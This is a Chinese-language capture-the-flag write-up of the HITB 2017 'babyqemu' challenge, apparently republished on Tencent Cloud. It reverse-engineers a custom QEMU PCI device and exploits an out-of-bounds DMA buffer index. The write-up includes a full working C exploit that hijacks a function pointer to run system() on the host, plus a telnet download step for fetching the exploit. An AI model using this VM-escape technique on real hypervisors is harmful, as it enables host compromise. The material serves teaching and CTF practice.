先看启动脚本,基本就是hitb的设备的漏洞了
#! /bin/sh
./qemu-system-x86_64 \
-initrd ./rootfs.cpio \
-kernel ./vmlinuz-4.8.0-52-generic \
-append 'console=ttyS0 root=/dev/ram oops=panic panic=1' \
-enable-kvm \
-monitor /dev/null \
-m 64M --nographic -L ./dependency/usr/local/shar e/qemu \
-L pc-bios \
-device hitb,id=vda
发现root登录都不用密码的
我们用ida载入,由于有符号的,函数那直接搜索hitb就出现相关函数了,通过初始化函数即下面的init函数可以看到device id是0x2333(记住WORD1这个是device id就行),还有设置了pci_hitb_realize也是初始化的,pci_hitb_uninit就是跟pci_hitb_realize相反的操作,进行destroy,del等操作
void __fastcall hitb_class_init(ObjectClass_0 *a1, void *data)
{
ObjectClass_0 *v2; // rax
v2 = object_class_dynamic_cast_assert(
a1,
"pci-device",
"/mnt/hgfs/eadom/workspcae/projects/hitbctf2017/babyqemu/qemu/hw/misc/hitb.c",
469,
"hitb_class_init");
BYTE4(v2[2].object_cast_cache[3]) = 0x10;
HIWORD(v2[2].object_cast_cache[3]) = 0xFF;
v2[2].type = (Type)pci_hitb_realize;
v2[2].object_cast_cache[0] = (const char *)pci_hitb_uninit;
LOWORD(v2[2].object_cast_cache[3]) = 0x1234;
WORD1(v2[2].object_cast_cache[3]) = 0x2333; // device_id
}
ida在local type那里可以搜索hitb,可以看到设备的数据结构
struct __attribute__((aligned(16))) HitbState
{
PCIDevice_0 pdev;
MemoryRegion_0 mmio;
QemuThread_0 thread;
QemuMutex_0 thr_mutex;
QemuCond_0 thr_cond;
_Bool stopping;
uint32_t addr4;
uint32_t fact;
uint32_t status;
uint32_t irq_status;
dma_state dma;
QEMUTimer_0 dma_timer;
char dma_buf[4096];
void (*enc)(char *, unsigned int);
uint64_t dma_mask;
};
在struct那里有偏移会好点
00000000 HitbState struc ; (sizeof=0x1BD0, align=0x10, copyof_1493)
00000000 pdev PCIDevice_0 ?
000009F0 mmio MemoryRegion_0 ?
00000AF0 thread QemuThread_0 ?
00000AF8 thr_mutex QemuMutex_0 ?
00000B20 thr_cond QemuCond_0 ?
00000B50 stopping db ?
00000B51 db ? ; undefined
00000B52 db ? ; undefined
00000B53 db ? ; undefined
00000B54 addr4 dd ?
00000B58 fact dd ?
00000B5C status dd ?
00000B60 irq_status dd ?
00000B64 db ? ; undefined
00000B65 db ? ; undefined
00000B66 db ? ; undefined
00000B67 db ? ; undefined
00000B68 dma dma_state ?
00000B88 dma_timer QEMUTimer_0 ?
00000BB8 dma_buf db 4096 dup(?)
00001BB8 enc dq ? ; offset
00001BC0 dma_mask dq ?
00001BC8 db ? ; undefined
00001BC9 db ? ; undefined
00001BCA db ? ; undefined
00001BCB db ? ; undefined
00001BCC db ? ; undefined
00001BCD db ? ; undefined
00001BCE db ? ; undefined
00001BCF db ? ; undefined
00001BD0 HitbState ends
还有两个相关的
00000000 dma_state struc ; (sizeof=0x20, align=0x8, copyof_1491)
00000000 ; XREF: HitbState/r
00000000 src dq ?
00000008 dst dq ?
00000010 cnt dq ?
00000018 cmd dq ?
00000020 dma_state ends
00000020
00000000 ; ---------------------------------------------------------------------------
00000000
00000000 QEMUTimer_0 struc ; (sizeof=0x30, align=0x8, copyof_529)
00000000 ; XREF: HitbState/r
00000000 expire_time dq ?
00000008 timer_list dq ? ; offset
00000010 cb dq ? ; offset
00000018 opaque dq ? ; offset
00000020 next dq ? ; offset
00000028 scale dd ?
0000002C db ? ; undefined
0000002D db ? ; undefined
0000002E db ? ; undefined
0000002F db ? ; undefined
00000030 QEMUTimer_0 ends
看一下pci_hitb_realize,
void __fastcall pci_hitb_realize(HitbState *pdev, Error_0 **errp)
{
pdev->pdev.config[61] = 1;
if ( !msi_init(&pdev->pdev, 0, 1u, 1, 0, errp) )
{
timer_init_tl(&pdev->dma_timer, main_loop_tlg.tl[1], 1000000, (QEMUTimerCB *)hitb_dma_timer, pdev);
qemu_mutex_init(&pdev->thr_mutex);
qemu_cond_init(&pdev->thr_cond);
qemu_thread_create(&pdev->thread, "hitb", (void *(*)(void *))hitb_fact_thread, pdev, 0);
memory_region_init_io(&pdev->mmio, &pdev->pdev.qdev.parent_obj, &hitb_mmio_ops, pdev, "hitb-mmio", 0x100000uLL);
pci_register_bar(&pdev->pdev, 0, 0, &pdev->mmio);
}
}
timer_init_tl设置了&pdev->dma_timer的回调函数是hitb_dma_timer,回调函数的参数是pdev,理解来源于下面qemu的源码及注释,而倒数第二行memory_region_init_io函数就是初始化内存映射IO,指定了MMIO的操作&hitb_mmio_ops(这个的read和write分别指向hitb_mmio_read,hitb_mmio_write),最后pci_register_bar将&pdev->mmio注册到qemu PCI设备的BAR(Base Address Registers,BAR记录了设备所需要的地址空间的类型,基址以及其他属性。),其中第二个参数0,代表注册的是MMIO,假如是1就代表注册PMIO
/**
* timer_init_tl:
* @ts: the timer to be initialised
* @timer_list: the timer list to attach the timer to
* @scale: the scale value for the timer
* @cb: the callback to be called when the timer expires
* @opaque: the opaque pointer to be passed to the callback
*
* Initialise a new timer and associate it with @timer_list.
* The caller is responsible for allocating the memory.
*
* You need not call an explicit deinit call. Simply make
* sure it is not on a list with timer_del.
*/
void timer_init_tl(QEMUTimer *ts,
QEMUTimerList *timer_list, int scale,
QEMUTimerCB *cb, void *opaque)
{
ts->timer_list = timer_list;
ts->cb = cb;
ts->opaque = opaque;
ts->scale = scale;
ts->expire_time = -1;
}
我们回过头来看看pci设备,根据id,就知道是最后一个了,这个系统太mini了,lspci -v
看不到任何详细的信息
# lspci
00:00.0 Class 0600: 8086:1237
00:01.3 Class 0680: 8086:7113
00:03.0 Class 0200: 8086:100e
00:01.1 Class 0101: 8086:7010
00:02.0 Class 0300: 1234:1111
00:01.0 Class 0601: 8086:7000
00:04.0 Class 00ff: 1234:2333
那我们去看文件系统中的,可以看到MMIO的信息,起始地址是0x00000000fea00000
,根据第二个地址,size可算出是0x100000这么大
# cat /sys/devices/pci0000\:00/0000:00\:04.0/resource
0x00000000fea00000 0x00000000feafffff 0x0000000000040200
0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000
其实除了hitb_class_init,还有hitb_instance_init初始化函数,他们都在hitb_info_27046中
.data.rel.ro:0000000000969020 ; Function-local static variable
.data.rel.ro:0000000000969020 ; const TypeInfo_0 hitb_info_27046
.data.rel.ro:0000000000969020 hitb_info_27046 dq offset aHitb ; name
.data.rel.ro:0000000000969020 ; DATA XREF: pci_hitb_register_types↑o
.data.rel.ro:0000000000969020 dq offset aVirtioPciDevic+7; parent ; "hitb" ...
.data.rel.ro:0000000000969020 dq 1BD0h ; instance_size
.data.rel.ro:0000000000969020 dq offset hitb_instance_init; instance_init
.data.rel.ro:0000000000969020 dq 0 ; instance_post_init
.data.rel.ro:0000000000969020 dq 0 ; instance_finalize
.data.rel.ro:0000000000969020 db 0 ; abstract
.data.rel.ro:0000000000969020 db 7 dup(0)
.data.rel.ro:0000000000969020 dq 0 ; class_size
.data.rel.ro:0000000000969020 dq offset hitb_class_init; class_init
.data.rel.ro:0000000000969020 dq 0 ; class_base_init
.data.rel.ro:0000000000969020 dq 0 ; class_finalize
.data.rel.ro:0000000000969020 dq 0 ; class_data
.data.rel.ro:0000000000969020 dq 0 ; interfaces
.data.rel.ro:0000000000969088 align 20h
而hitb_instance_init主要是初始化了HitbState->enc为函数指针hitb_enc
注:v1 += 0x1BC0 为dma_mask的偏移,减8就是enc的偏移了
void __fastcall hitb_instance_init(Object_0 *obj)
{
__int64 v1; // rax
v1 = (__int64)object_dynamic_cast_assert(
obj,
"hitb",
"/mnt/hgfs/eadom/workspcae/projects/hitbctf2017/babyqemu/qemu/hw/misc/hitb.c",
459,
"hitb_instance_init");
*(_QWORD *)(v1 + 0x1BC0) = 0xFFFFFFFLL;
v1 += 0x1BC0LL;
*(_QWORD *)(v1 - 8) = hitb_enc;
object_property_add(
obj,
"dma_mask",
"uint64",
(ObjectPropertyAccessor *)hitb_obj_uint64,
(ObjectPropertyAccessor *)hitb_obj_uint64,
0LL,
(void *)v1,
0LL);
}
最后抛开题目,看看这两个init函数是怎么调用的,向上回溯发现从头到尾的调用是这样的,首先是_start函数,调用libc_start_main,再调用libc_csu_init,而__libc_csu_init循环调用_frame_dummy_init_array_entry[]里面的函数指针
void __fastcall _libc_csu_init(unsigned int a1, __int64 a2, __int64 a3)
{
__int64 v3; // r13
signed __int64 v4; // rbp
__int64 v5; // rbx
v3 = a3;
v4 = &_do_global_dtors_aux_fini_array_entry - _frame_dummy_init_array_entry;
init_proc();
if ( v4 )
{
v5 = 0LL;
do
((void (__fastcall *)(_QWORD, __int64, __int64))_frame_dummy_init_array_entry[v5++])(a1, a2, v3);
while ( v5 != v4 );
}
}
而_frame_dummy_init_array_entry[]里面的有下面的函数指针
.init_array:0000000000964D68 dq offset do_qemu_init_pci_hitb_register_types
跟随这个路子一直走,刚好就注册了hitb_info_27046
void __cdecl do_qemu_init_pci_hitb_register_types()
{
register_module_init((void (*)(void))pci_hitb_register_types, MODULE_INIT_QOM_0);
}
void __cdecl pci_hitb_register_types()
{
type_register_static(&hitb_info_27046);
}
read函数
uint64_t __fastcall hitb_mmio_read(HitbState *opaque, hwaddr addr, unsigned int size)
{
uint64_t result; // rax
uint64_t val; // ST08_8
result = -1LL;
if ( size == 4 )
{
if ( addr == 128 )
return opaque->dma.src;
if ( addr > 0x80 )
{
if ( addr == 140 )
return *(dma_addr_t *)((char *)&opaque->dma.dst + 4);
if ( addr <= 0x8C )
{
if ( addr == 132 )
return *(dma_addr_t *)((char *)&opaque->dma.src + 4);
if ( addr == 136 )
return opaque->dma.dst;
}
else
{
if ( addr == 144 )
return opaque->dma.cnt;
if ( addr == 152 )
return opaque->dma.cmd;
}
}
else
{
if ( addr == 8 )
{
qemu_mutex_lock(&opaque->thr_mutex);
val = opaque->fact;
qemu_mutex_unlock(&opaque->thr_mutex);
return val;
}
if ( addr <= 8 )
{
result = 16777453LL;
if ( !addr )
return result;
if ( addr == 4 )
return opaque->addr4;
}
else
{
if ( addr == 32 )
return opaque->status;
if ( addr == 36 )
return opaque->irq_status;
}
}
result = -1LL;
}
return result;
}
write函数
void __fastcall hitb_mmio_write(HitbState *opaque, hwaddr addr, uint64_t val, unsigned int size)
{
uint32_t v4; // er13
int v5; // edx
bool v6; // zf
int64_t v7; // rax
if ( (addr > 0x7F || size == 4) && (!((size - 4) & 0xFFFFFFFB) || addr <= 0x7F) )
{
if ( addr == 128 )
{
if ( !(opaque->dma.cmd & 1) )
opaque->dma.src = val;
}
else
{
v4 = val;
if ( addr > 0x80 )
{
if ( addr == 140 )
{
if ( !(opaque->dma.cmd & 1) )
*(dma_addr_t *)((char *)&opaque->dma.dst + 4) = val;
}
else if ( addr > 0x8C )
{
if ( addr == 144 )
{
if ( !(opaque->dma.cmd & 1) )
opaque->dma.cnt = val;
}
else if ( addr == 152 && val & 1 && !(opaque->dma.cmd & 1) )
{
opaque->dma.cmd = val;
v7 = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL_0);
timer_mod(
&opaque->dma_timer,
((signed __int64)((unsigned __int128)(4835703278458516699LL * (signed __int128)v7) >> 64) >> 18)
- (v7 >> 63)
+ 100);
}
}
else if ( addr == 132 )
{
if ( !(opaque->dma.cmd & 1) )
*(dma_addr_t *)((char *)&opaque->dma.src + 4) = val;
}
else if ( addr == 136 && !(opaque->dma.cmd & 1) )
{
opaque->dma.dst = val;
}
}
else if ( addr == 32 )
{
if ( val & 0x80 )
_InterlockedOr((volatile signed __int32 *)&opaque->status, 0x80u);
else
_InterlockedAnd((volatile signed __int32 *)&opaque->status, 0xFFFFFF7F);
}
else if ( addr > 0x20 )
{
if ( addr == 96 )
{
v6 = ((unsigned int)val | opaque->irq_status) == 0;
opaque->irq_status |= val;
if ( !v6 )
hitb_raise_irq(opaque, 0x60u);
}
else if ( addr == 100 )
{
v5 = ~(_DWORD)val;
v6 = (v5 & opaque->irq_status) == 0;
opaque->irq_status &= v5;
if ( v6 && !msi_enabled(&opaque->pdev) )
pci_set_irq(&opaque->pdev, 0);
}
}
else if ( addr == 4 )
{
opaque->addr4 = ~(_DWORD)val;
}
else if ( addr == 8 && !(opaque->status & 1) )
{
qemu_mutex_lock(&opaque->thr_mutex);
opaque->fact = v4;
_InterlockedOr((volatile signed __int32 *)&opaque->status, 1u);
qemu_cond_signal(&opaque->thr_cond);
qemu_mutex_unlock(&opaque->thr_mutex);
}
}
}
}
可以看到read函数返回的都是HitbState的字段,而write函数则是对HitbState字段的写入,应该没啥漏洞,关注下write函数的下面片段,这个应该会调用opaque->dma_timer的回调函数hitb_dma_timer
else if ( addr == 152 && val & 1 && !(opaque->dma.cmd & 1) )
{
opaque->dma.cmd = val;
v7 = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL_0);
timer_mod(
&opaque->dma_timer,
((signed __int64)((unsigned __int128)(4835703278458516699LL * (signed __int128)v7) >> 64) >> 18)
- (v7 >> 63)
+ 100);
}
qemu_clock_get_ns获取时钟的纳秒值,timer_mod修改dma_timer的expire_time,这样应该可以触发hitb_dma_timer的调用
这两个函数定义可以看下面的链接 https://github.com/qemu/qemu/blob/f2cfa1229e539ee1bb1822912075cf25538ad6b9/include/qemu/timer.h#L96 https://github.com/qemu/qemu/blob/f2cfa1229e539ee1bb1822912075cf25538ad6b9/include/qemu/timer.h#L666
我们看看hitb_dma_timer函数,看这个函数可能算是模拟了DMA(直接存储器访问),可以让我们从读写dma_buf。(看看维基百科的描述:直接内存访问(Direct Memory Access,DMA)是计算机科学中的一种内存访问技术。它允许某些电脑内部的硬件子系统(电脑外设),可以独立地直接读写系统内存,而不需中央处理器(CPU)介入处理 。)
void __fastcall hitb_dma_timer(HitbState *opaque)
{
dma_addr_t v1; // rax
__int64 v2; // rdx
uint8_t *v3; // rsi
dma_addr_t v4; // rax
dma_addr_t v5; // rdx
uint8_t *v6; // rbp
uint8_t *v7; // rbp
v1 = opaque->dma.cmd;
if ( v1 & 1 )
{
if ( v1 & 2 )
{
v2 = (unsigned int)(LODWORD(opaque->dma.src) - 0x40000);
if ( v1 & 4 )
{
v7 = (uint8_t *)&opaque->dma_buf[v2];
((void (__fastcall *)(uint8_t *, _QWORD))opaque->enc)(v7, LODWORD(opaque->dma.cnt));
v3 = v7;
}
else
{
v3 = (uint8_t *)&opaque->dma_buf[v2];
}
cpu_physical_memory_rw(opaque->dma.dst, v3, opaque->dma.cnt, 1);// 1是write
v4 = opaque->dma.cmd;
v5 = opaque->dma.cmd & 4;
}
else
{
v6 = (uint8_t *)&opaque[-36] + (unsigned int)opaque->dma.dst - 2824;
LODWORD(v3) = (_DWORD)opaque + opaque->dma.dst - 0x40000 + 3000;
cpu_physical_memory_rw(opaque->dma.src, v6, opaque->dma.cnt, 0);
v4 = opaque->dma.cmd;
v5 = opaque->dma.cmd & 4;
if ( opaque->dma.cmd & 4 )
{
v3 = (uint8_t *)LODWORD(opaque->dma.cnt);
((void (__fastcall *)(uint8_t *, uint8_t *, dma_addr_t))opaque->enc)(v6, v3, v5);
v4 = opaque->dma.cmd;
v5 = opaque->dma.cmd & 4;
}
}
opaque->dma.cmd = v4 & 0xFFFFFFFFFFFFFFFELL; // 将cmd的最低位置0了
if ( v5 )
{
opaque->irq_status |= 0x100u;
hitb_raise_irq(opaque, (uint32_t)v3);
}
}
}
函数更加opaque->dma.cmd选择不同的分支,但是cmd的最低bit必须为1
这里重点是两个分支,一个是cmd&2==1的时候,即第二个bit为1,另一个分支则第二个bit为0
先看两个都有的cpu_physical_memory_rw,它调用的是address_space_rw
void __fastcall cpu_physical_memory_rw(hwaddr addr, uint8_t *buf, int len, int is_write)
{
int v4; // er8
MemTxAttrs_0 v5; // 0:dl.1
v4 = len;
v5 = (MemTxAttrs_0)1;
address_space_rw(&address_space_memory, addr, v5, buf, v4, is_write != 0);
}
MemTxResult __fastcall address_space_rw(AddressSpace_0 *as, hwaddr addr, MemTxAttrs_0 attrs, uint8_t *buf, int len, _Bool is_write)
{
MemTxResult result; // eax
if ( is_write )
result = address_space_write(as, addr, attrs, buf, len);
else
result = address_space_read_full(as, addr, attrs, buf, len);
return result;
}
所以第一个分支cpu_physical_memory_rw最后一个参数是1,所以最终调用的是address_space_write,第二个分支当然就是address_space_read_full
看address_space_write代码,可以知道cpu_physical_memory_rw(opaque->dma.dst, v3, opaque->dma.cnt, 1);
是将v3复制到opaque->dma.dst,即将dma_buf[opaque->dma.src- 0x40000]
读取到opaque->dma.dst,而cpu_physical_memory_rw(opaque->dma.src, v6, opaque->dma.cnt, 0);
则将opaque->dma.src复制到v6,即将opaque->dma.src的内容复制到dma_buf[opaque->dma.dst- 0x40000]
值得注意的是,cpu_physical_memory_rw的第一个参数为硬件地址,即物理地址,所以我们需要将qemu里面的虚拟地址,转化为物理地址。
分析了这么多,漏洞点就在于对于dma_buf的索引没有任何限制,导致可以越界读写
cpu_physical_memory_rw函数的第一个参数,他是一个物理地址,整个过程就是一个中间人的一个功能。 cmd= 1|2时,可以通过数组索引越界,将泄露的地址读入物理地址,致我们从这个地址读出,就完成了泄露 当cmd=1 时,可以将物理地址上面的值写到任意地址(事前我们可以通过上面cmd= 1|2时,将我们要写入的值写到物理地址)
漏洞利用思路 1、泄露函数指针enc,由于这个qemu-system-x86_64的导入表有system,所以我们直接可以算出system@plt 2、用system覆盖enc指针 3、写入opaque->dma_buf为要执行的命令,比如cat flag 4、使用cmd=1|2|4时,调用enc函数,劫持控制流
在编写代码中有一个坑点,你mmio_write的值的大小是8个字节,就会写两次,导致覆盖了下一个值,所以一定要按照src,dst,cnt的顺序来设置
我们在题目的目录建立一个flag文件用于测试
giantbranch@ubuntu:~/qemu_escape/HITB-GSEC-2017-babyqemu$ ls
babyqemu.tar.gz exp launch.sh qemu-system-x86_64 start.txt
breakpoint.txt exp.c pc-bios rootfs vmlinuz-4.8.0-52-generic
cpexptorootfs.sh flag peda-session-qemu-system-x86_64.txt rootfs.cpio
giantbranch@ubuntu:~/qemu_escape/HITB-GSEC-2017-babyqemu$ cat flag
flag{You escaped successfully!}
下面是逃逸执行system(“cat flag”)的效果(-append ‘console=ttyS0 root=/dev/ram oops=panic panic=1’ 可以让我们在host执行system(cmd)
,而输出显示在qemu的命令行中)
__ __ _ _ _ _ ___ _____ ____
\ \ / /__| | ___ ___ _ __ ___ ___ | |_ ___ | | | |_ _|_ _| __ )
\ \ /\ / / _ \ |/ __/ _ \| '_ ` _ \ / _ \ | __/ _ \ | |_| || | | | | _ \
\ V V / __/ | (_| (_) | | | | | | __/ | || (_) | | _ || | | | | |_) |
\_/\_/ \___|_|\___\___/|_| |_| |_|\___| \__\___/ |_| |_|___| |_| |____/
Welcome to HITB
HITB login: root
# ./exp
mmio_base Resource0Base: 0x7ff8115c9000
gva_to_gpa tmpbuf_phys_addr 0x1dee890
hitb_enc_addr: 0x55c0aa03bdd0
binary_base_addr: 0x55c0a9db8000
system_addr: 0x55c0a9fb5b18
flag{You escaped successfully!}
#
顺便尝试弹计算器
最终exp
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <errno.h>
#include <signal.h>
#include <fcntl.h>
#include <ctype.h>
#include <termios.h>
#include <assert.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/io.h>
#define MAP_SIZE 4096UL
#define MAP_MASK (MAP_SIZE - 1)
#define DMA_BASE 0x40000
#define PAGE_SHIFT 12
#define PAGE_SIZE (1 << PAGE_SHIFT)
#define PFN_PRESENT (1ull << 63)
#define PFN_PFN ((1ull << 55) - 1)
char* pci_device_name = "/sys/devices/pci0000:00/0000:00:04.0/resource0";
unsigned char* tmpbuf;
uint64_t tmpbuf_phys_addr;
unsigned char* mmio_base;
unsigned char* getMMIOBase(){
int fd;
if((fd = open(pci_device_name, O_RDWR | O_SYNC)) == -1) {
perror("open pci device");
exit(-1);
}
mmio_base = mmap(0, MAP_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
if(mmio_base == (void *) -1) {
perror("mmap");
exit(-1);
}
return mmio_base;
}
// 获取页内偏移
uint32_t page_offset(uint32_t addr)
{
// addr & 0xfff
return addr & ((1 << PAGE_SHIFT) - 1);
}
uint64_t gva_to_gfn(void *addr)
{
uint64_t pme, gfn;
size_t offset;
int fd;
fd = open("/proc/self/pagemap", O_RDONLY);
if (fd < 0) {
perror("open");
exit(1);
}
// printf("pfn_item_offset : %p\n", (uintptr_t)addr >> 9);
offset = ((uintptr_t)addr >> 9) & ~7;
////下面是网上其他人的代码,只是为了理解上面的代码
//一开始除以 0x1000 (getpagesize=0x1000,4k对齐,而且本来低12位就是页内索引,需要去掉),即除以2**12, 这就获取了页号了,
//pagemap中一个地址64位,即8字节,也即sizeof(uint64_t),所以有了页号后,我们需要乘以8去找到对应的偏移从而获得对应的物理地址
//最终 vir/2^12 * 8 = (vir / 2^9) & ~7
//这跟上面的右移9正好对应,但是为什么要 & ~7 ,因为你 vir >> 12 << 3 , 跟vir >> 9 是有区别的,vir >> 12 << 3低3位肯定是0,所以通过& ~7将低3位置0
// int page_size=getpagesize();
// unsigned long vir_page_idx = vir/page_size;
// unsigned long pfn_item_offset = vir_page_idx*sizeof(uint64_t);
lseek(fd, offset, SEEK_SET);
read(fd, &pme, 8);
// 确保页面存在——page is present.
if (!(pme & PFN_PRESENT))
return -1;
// physical frame number
gfn = pme & PFN_PFN;
return gfn;
}
uint64_t gva_to_gpa(void *addr)
{
uint64_t gfn = gva_to_gfn(addr);
assert(gfn != -1);
return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr);
}
void mmio_write(uint64_t addr, uint64_t value)
{
*((uint64_t*)(mmio_base + addr)) = value;
}
uint64_t mmio_read(uint64_t addr)
{
return *((uint64_t*)(mmio_base + addr));
}
void set_cnt(uint64_t val)
{
mmio_write(144, val);
}
void set_src(uint64_t val)
{
mmio_write(128, val);
}
void set_dst(uint64_t val)
{
mmio_write(136, val);
}
void start_dma_timer(uint64_t val){
mmio_write(152, val);
}
void dma_read(uint64_t offset, uint64_t cnt){
// 设置dma_buf的索引
set_src(DMA_BASE + offset);
// 设置读取后要写入的物理地址
set_dst(tmpbuf_phys_addr);
// 设置读取的大小
set_cnt(cnt);
// 触发hitb_dma_timer
start_dma_timer(1|2);
// 等待上面的执行完
sleep(1);
}
void dma_write(uint64_t offset, char* buf, uint64_t cnt)
{
// 将我们要写的内容先复制到tmpbuf
memcpy(tmpbuf, buf, cnt);
//设置物理地址(要从这读取写到dma_buf[opaque->dma.dst-0x40000])
set_src(tmpbuf_phys_addr);
// 设置dma_buf的索引
set_dst(DMA_BASE + offset);
// 设置写入大小
set_cnt(cnt);
// 触发hitb_dma_timer
start_dma_timer(1);
// 等待上面的执行完
sleep(1);
}
void dma_write_qword(uint64_t offset, uint64_t val)
{
dma_write(offset, (char *)&val, 8);
}
void dma_enc_read(uint64_t offset, uint64_t cnt)
{
// 设置dma_buf的索引
set_src(DMA_BASE + offset);
// 设置读取后要写入的物理地址
set_dst(tmpbuf_phys_addr);
// 设置读取的大小
set_cnt(cnt);
// 触发hitb_dma_timer
start_dma_timer(1|2|4);
// 等待上面的执行完
sleep(1);
}
int main(int argc, char const *argv[])
{
getMMIOBase();
printf("mmio_base Resource0Base: %p\n", mmio_base);
tmpbuf = malloc(0x1000);
tmpbuf_phys_addr = gva_to_gpa(tmpbuf);
printf("gva_to_gpa tmpbuf_phys_addr %p\n", (void*)tmpbuf_phys_addr);
//just test
// dma_write(0, "giantbranch", 11);
// dma_read(0, 11);
// printf("tmpbuf: %s\n", tmpbuf);
// 将enc函数指针写到tmpbuf_phys_addr,之后通过tmpbuf读出即可
dma_read(4096, 8);
uint64_t hitb_enc_addr = *((uint64_t*)tmpbuf);
uint64_t binary_base_addr = hitb_enc_addr - 0x283DD0;
uint64_t system_addr = binary_base_addr + 0x1FDB18;
printf("hitb_enc_addr: 0x%lx\n", hitb_enc_addr);
printf("binary_base_addr: 0x%lx\n", binary_base_addr);
printf("system_addr: 0x%lx\n", system_addr);
// 覆盖enc函数指针为system地址
dma_write_qword(4096, system_addr);
// 将我们要执行的命令复制到tmpbuf中
// char* command = "gnome-calculator";
// char* command = "pwd";
char* command = "cat flag";
dma_write(0x200, command, strlen(command));
// 触发hitb_dma_timer中的enc函数,从而调用syetem
// 下面的666设置的是cnt,可以是任意值,没什么影响
dma_enc_read(0x200, 666);
return 0;
}
由于有符号,直接下断点即可,由于启动期间我这中断多多次,所以搞了很多个c
giantbranch@ubuntu:~/qemu_escape/HITB-GSEC-2017-babyqemu$ cat start.txt
run -initrd ./rootfs.cpio -kernel ./vmlinuz-4.8.0-52-generic -append 'console=ttyS0 root=/dev/ram oops=panic panic=1' -enable-kvm -monitor /dev/null -m 64M --nographic -L ./dependency/usr/local/share/qemu -L pc-bios -device hitb,id=vda
b hitb_dma_timer
b hitb_mmio_write
c
c
c
c
c
c
giantbranch@ubuntu:~/qemu_escape/HITB-GSEC-2017-babyqemu$ sudo gdb -q ./qemu-system-x86_64
pwndbg: loaded 176 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
Reading symbols from ./qemu-system-x86_64...done.
gdb-peda$ source start.txt
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[New Thread 0x7ffff0c35700 (LWP 28226)]
[New Thread 0x7ffff0434700 (LWP 28229)]
[New Thread 0x7fffed3ff700 (LWP 28231)]
由于这个ssh和scp都不奏效,而且网络也不通,所以就只能解开它的文件系统,把exp放进去root家目录,之后再压缩
解压命令是cpio -idmv < rootfs.cpio
,注意将rootfs.cpio放入一个新建的文件夹内再解开,有时候rootfs.cpio被gz二次压缩了可以用gunzip ./rootfs.cpio.gz
解开,再执行上面的命令即可。
那么每次修改为exp,执行下面的脚本即可
giantbranch@ubuntu:~/qemu_escape/HITB-GSEC-2017-babyqemu$ cat ./cpexptorootfs.sh
gcc -o exp -static exp.c
cp ./exp ./rootfs/root
cd ./rootfs && find . | cpio -o --format=newc > ../rootfs.cpio
当然在实际比赛中,网络肯定是通的,而且这里的镜像是一个类似于嵌入式的简单系统,没有nc,但是有busybox,busybox支持telnet命令,所以可以通过下面示例进行下载exp
# telnet XXX.XXX.XXX.XXX 6666 > pwn.b64
# base64 -d pwn.b64 > pwn
# chmod +x pwn
# ./pwn
主要参考 https://kitctf.de/writeups/hitb2017/babyqemu
其他参考 https://github.com/coreos/qemu/blob/ed988a3274c8e08ce220419cb48ef81a16754ea4/include/qemu/timer.h#L414 https://github.com/qemu/qemu https://github.com/qemu/qemu/blob/f2cfa1229e539ee1bb1822912075cf25538ad6b9/include/qemu/timer.h#L96 https://github.com/qemu/qemu/blob/f2cfa1229e539ee1bb1822912075cf25538ad6b9/include/qemu/timer.h#L666 https://zh.wikipedia.org/wiki/%E7%9B%B4%E6%8E%A5%E8%A8%98%E6%86%B6%E9%AB%94%E5%AD%98%E5%8F%96 https://www.giantbranch.cn/2019/07/17/VM%20escape%20%E4%B9%8B%20QEMU%20Case%20Study/
扫码关注腾讯云开发者
领取腾讯云代金券
Copyright © 2013 - 2025 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号 | 京公网安备号11010802020287
Copyright © 2013 - 2025 Tencent Cloud.
All Rights Reserved. 腾讯云 版权所有